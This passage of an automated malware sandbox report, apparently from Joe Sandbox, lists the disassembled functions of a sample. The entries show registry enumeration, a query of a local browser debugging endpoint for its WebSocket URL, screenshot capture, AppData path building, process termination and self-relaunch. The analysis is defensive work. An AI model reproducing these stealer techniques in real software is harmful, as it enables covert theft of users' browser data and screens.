                            • Part of subcall function 007271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007271FE
                          • RegOpenKeyExA.ADVAPI32(?,010DAF70,00000000,00020019,?), ref: 007237BD
                          • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 007237F7
                          • wsprintfA.USER32 ref: 00723822
                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00723840
                          • RegCloseKey.ADVAPI32(?), ref: 0072384E
                          • RegCloseKey.ADVAPI32(?), ref: 00723858
                          • RegQueryValueExA.ADVAPI32(?,010DE098,00000000,000F003F,?,?), ref: 007238A1
                          • lstrlen.KERNEL32(?), ref: 007238B6
                          • RegQueryValueExA.ADVAPI32(?,010DDF90,00000000,000F003F,?,00000400), ref: 00723927
                          • RegCloseKey.ADVAPI32(?), ref: 00723972
                          • RegCloseKey.ADVAPI32(?), ref: 00723989
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 13140697-3278919252
                          • Opcode ID: 32c73d73b140030b62e4379974ea306cb95a6eff9b19b42f463960a497cbb6ca
                          • Instruction ID: 7e3644be3be1067035d6fd3e5c7c0e8fcf4400b19c60cfbf7bdf582db1f0ea83
                          • Opcode Fuzzy Hash: 32c73d73b140030b62e4379974ea306cb95a6eff9b19b42f463960a497cbb6ca
                          • Instruction Fuzzy Hash: 44919EB2904218DFCB14DFA4ED84A9EB7B9FB48310F148169F509BB251DB39AE45CF90
                          Function 007090C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                          Download Yara Rule
                          APIs
                          • InternetOpenA.WININET(0072CFEC,00000001,00000000,00000000,00000000), ref: 007090DF
                          • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 007090FC
                          • InternetCloseHandle.WININET(00000000), ref: 00709109
                          • InternetReadFile.WININET(?,?,?,00000000), ref: 00709166
                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00709197
                          • InternetCloseHandle.WININET(00000000), ref: 007091A2
                          • InternetCloseHandle.WININET(00000000), ref: 007091A9
                          • strlen.MSVCRT ref: 007091BA
                          • strlen.MSVCRT ref: 007091ED
                          • strlen.MSVCRT ref: 0070922E
                          • strlen.MSVCRT ref: 0070924C
                            • Part of subcall function 00708980: std::_Xinvalid_argument.LIBCPMT ref: 00708996
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                          • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                          • API String ID: 1530259920-2144369209
                          • Opcode ID: 139110dedbcd7ab50a7d602cbf40e925bd2e46fc174384ac9eb67cb4a55e980f
                          • Instruction ID: 34cf50d867d802eab6f32b0d8ad31ca1d6ba24daccfd7ddb8419bed80a5476e3
                          • Opcode Fuzzy Hash: 139110dedbcd7ab50a7d602cbf40e925bd2e46fc174384ac9eb67cb4a55e980f
                          • Instruction Fuzzy Hash: DA51C6B1610209ABE724DBA8DC45BDEF7F9DB48710F140169F504E32C1DBB8EA448BA1
                          Function 00721660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 007216A1
                          • lstrcpy.KERNEL32(00000000,010CB180), ref: 007216CC
                          • lstrlen.KERNEL32(?), ref: 007216D9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007216F6
                          • lstrcat.KERNEL32(00000000,?), ref: 00721704
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0072172A
                          • lstrlen.KERNEL32(010D9D18), ref: 0072173F
                          • lstrcpy.KERNEL32(00000000,?), ref: 00721762
                          • lstrcat.KERNEL32(00000000,010D9D18), ref: 0072176A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00721792
                          • ShellExecuteEx.SHELL32(?), ref: 007217CD
                          • ExitProcess.KERNEL32 ref: 00721803
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                          • String ID: <
                          • API String ID: 3579039295-4251816714
                          • Opcode ID: e70a2f10a37923a4d4b78244434c3cfb78c728f002c498bc57cee41c4fa8a57e
                          • Instruction ID: deebe60534859b81b8ce0b727d8280c2a0463c72314ddc975a2c716395ca66f7
                          • Opcode Fuzzy Hash: e70a2f10a37923a4d4b78244434c3cfb78c728f002c498bc57cee41c4fa8a57e
                          • Instruction Fuzzy Hash: 2F519071A15229EBDB11DFA4DC88A9EB7F9BF94300F404125E905E3391DF78AE069F90
                          Function 0071EFB0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071EFE4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071F012
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0071F026
                          • lstrlen.KERNEL32(00000000), ref: 0071F035
                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 0071F053
                          • StrStrA.SHLWAPI(00000000,?), ref: 0071F081
                          • lstrlen.KERNEL32(?), ref: 0071F094
                          • lstrlen.KERNEL32(00000000), ref: 0071F0B2
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 0071F0FF
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 0071F13F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$AllocLocal
                          • String ID: ERROR
                          • API String ID: 1803462166-2861137601
                          • Opcode ID: 3f0b194565ecc313dfdf39b844c8bec6f496f6a2640723b46bed791efcc4f14d
                          • Instruction ID: 88e7227e6c3e9124ea9277b64d8e0b55cc46424269e93d0cdc86274656a9a2d9
                          • Opcode Fuzzy Hash: 3f0b194565ecc313dfdf39b844c8bec6f496f6a2640723b46bed791efcc4f14d
                          • Instruction Fuzzy Hash: BF516372A24105DBCB21AF7CDC4DAAE77E5AF54300F058268FC45AB293DA38DC469B90
                          Function 0070A010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                          Download Yara Rule
                          APIs
                          • GetEnvironmentVariableA.KERNEL32(010D8B40,00939BD8,0000FFFF), ref: 0070A026
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070A053
                          • lstrlen.KERNEL32(00939BD8), ref: 0070A060
                          • lstrcpy.KERNEL32(00000000,00939BD8), ref: 0070A08A
                          • lstrlen.KERNEL32(00734C4C), ref: 0070A095
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070A0B2
                          • lstrcat.KERNEL32(00000000,00734C4C), ref: 0070A0BE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070A0E4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070A0EF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070A114
                          • SetEnvironmentVariableA.KERNEL32(010D8B40,00000000), ref: 0070A12F
                          • LoadLibraryA.KERNEL32(010DD308), ref: 0070A143
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                          • String ID:
                          • API String ID: 2929475105-0
                          • Opcode ID: e6c89d8a9ab64762dd79b538216cea22de1b8d3573181bd644041467c1e3c3ec
                          • Instruction ID: 37788f9264be76873d132cf3cf8a1da6887c12532cd2a05fe264d5f295541c42
                          • Opcode Fuzzy Hash: e6c89d8a9ab64762dd79b538216cea22de1b8d3573181bd644041467c1e3c3ec
                          • Instruction Fuzzy Hash: C8919071A14704EFD731AFA4DC88A6737E6AB94705F404628F805872E2EFBDDD419B82
                          Function 0071C840 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071C8A2
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071C8D1
                          • lstrlen.KERNEL32(00000000), ref: 0071C8FC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071C932
                          • StrCmpCA.SHLWAPI(00000000,00734C3C), ref: 0071C943
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: 671aa43ed04ae219a44a2be752c6b062e7328be3731756eb5b5a34cb38233827
                          • Instruction ID: f14716d5881c984f14ec603ea62cc10dce30a4be1c68281bb49d34bf7903ee84
                          • Opcode Fuzzy Hash: 671aa43ed04ae219a44a2be752c6b062e7328be3731756eb5b5a34cb38233827
                          • Instruction Fuzzy Hash: D761C372E542199BDB13EFF8C889AEE7BF8AF05700F048165E841F7281D77C99468B90
                          Function 00724500 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 95memoryCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0072451A
                          • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00714F39), ref: 00724545
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0072454C
                          • wsprintfW.USER32 ref: 0072455B
                          • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 007245CA
                          • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 007245D9
                          • CloseHandle.KERNEL32(00000000,?,?), ref: 007245E0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                          • String ID: 9Oq$%hs$9Oq
                          • API String ID: 3729781310-2764654981
                          • Opcode ID: a6df7a39cd31f083e98c9560f8f33913f52492a66eb2b469c72cc4184ffa9a5b
                          • Instruction ID: e96ad7a17a6676e4615c2973b40e620aa5c7fb2a5c8d6cf1b848093ff579a5b8
                          • Opcode Fuzzy Hash: a6df7a39cd31f083e98c9560f8f33913f52492a66eb2b469c72cc4184ffa9a5b
                          • Instruction Fuzzy Hash: 1C318F72A14215BBDB20DBE5EC89FDE77B8FF45700F104055FA05E7180EBB4AA418BA5
                          Function 007241E0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                          Download Yara Rule
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00720CF0), ref: 00724276
                          • GetDesktopWindow.USER32 ref: 00724280
                          • GetWindowRect.USER32(00000000,?), ref: 0072428D
                          • SelectObject.GDI32(00000000,00000000), ref: 007242BF
                          • GetHGlobalFromStream.COMBASE(00720CF0,?), ref: 00724336
                          • GlobalLock.KERNEL32(?), ref: 00724340
                          • GlobalSize.KERNEL32(?), ref: 0072434D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                          • String ID:
                          • API String ID: 1264946473-0
                          • Opcode ID: fd07cefbcb385b346f92bcf07cc3261278ccb3b775b1d55f075aca388edfb2dc
                          • Instruction ID: 4d22eb18e12159a4260a78c91c9deb96161a9b98e27e3dd892add59af8ef6306
                          • Opcode Fuzzy Hash: fd07cefbcb385b346f92bcf07cc3261278ccb3b775b1d55f075aca388edfb2dc
                          • Instruction Fuzzy Hash: 83511CB5A24208EFDB10DFA4ED89AAEB7B9EF48300F104519F905A3251DB74AD05DFA0
                          Function 0071DFA0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcat.KERNEL32(?,010DD930), ref: 0071E00D
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0071E037
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071E06F
                          • lstrcat.KERNEL32(?,00000000), ref: 0071E07D
                          • lstrcat.KERNEL32(?,?), ref: 0071E098
                          • lstrcat.KERNEL32(?,?), ref: 0071E0AC
                          • lstrcat.KERNEL32(?,010CAF50), ref: 0071E0C0
                          • lstrcat.KERNEL32(?,?), ref: 0071E0D4
                          • lstrcat.KERNEL32(?,010DD1C8), ref: 0071E0E7
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071E11F
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0071E126
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
